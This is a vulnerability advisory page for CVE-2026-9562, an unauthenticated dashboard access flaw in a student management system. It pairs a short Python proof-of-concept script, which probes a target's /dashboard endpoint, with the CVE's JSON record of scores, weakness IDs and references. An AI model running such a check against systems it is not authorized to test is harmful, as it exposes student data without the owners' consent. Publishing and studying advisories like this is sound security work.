CVE-2026-9562

import requests import sys # POC for CVE-2026-9562: Improper Access Control in STUDENT-MANAGEMENT-SYSTEM # This script attempts to access the Dashboard without authentication. def check_vulnerability(target_url): """Check if the target is vulnerable to CVE-2026-9562.""" # Attempt to access the dashboard endpoint directly # Adjust the endpoint path based on actual application routing dashboard_url = f"{target_url}/dashboard" try: response = requests.get(dashboard_url, timeout=10) # Check if request is successful (200 OK) and contains dashboard content if response.status_code == 200 and ("student" in response.text.lower() or "dashboard" in response.text.lower()): print(f"[+] Target {target_url} appears to be VULNERABLE!") print(f"[+] Dashboard accessed without authentication.") return True else: print(f"[-] Target {target_url} does not appear to be vulnerable or endpoint is different.") return False except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python poc.py <target_url>") print("Example: python poc.py http://localhost:3000") sys.exit(1) url = sys.argv[1] check_vulnerability(url)

{"cve": {"id": "CVE-2026-9562", "sourceIdentifier": "[email protected]", "published": "2026-05-26T17:16:57.413", "lastModified": "2026-05-26T19:37:00.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in sambitraj STUDENT-MANAGEMENT-SYSTEM up to 56ba287f2e9031523ccb4244cb6e3fe530e4e5d5. The affected element is an unknown function of the component Dashboard. Such manipulation leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. Multiple endpoints are affected. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-266"}, {"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/sambitraj/STUDENT-MANAGEMENT-SYSTEM/", "source": "[email protected]"}, {"url": "https://github.com/sambitraj/STUDENT-MANAGEMENT-SYSTEM/issues/1", "source": "[email protected]"}, {"url": "https://github.com/sambitraj/STUDENT-MANAGEMENT-SYSTEM/issues/1#issue-4348905508", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/815536", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365625", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365625/cti", "source": "[email protected]"}]}}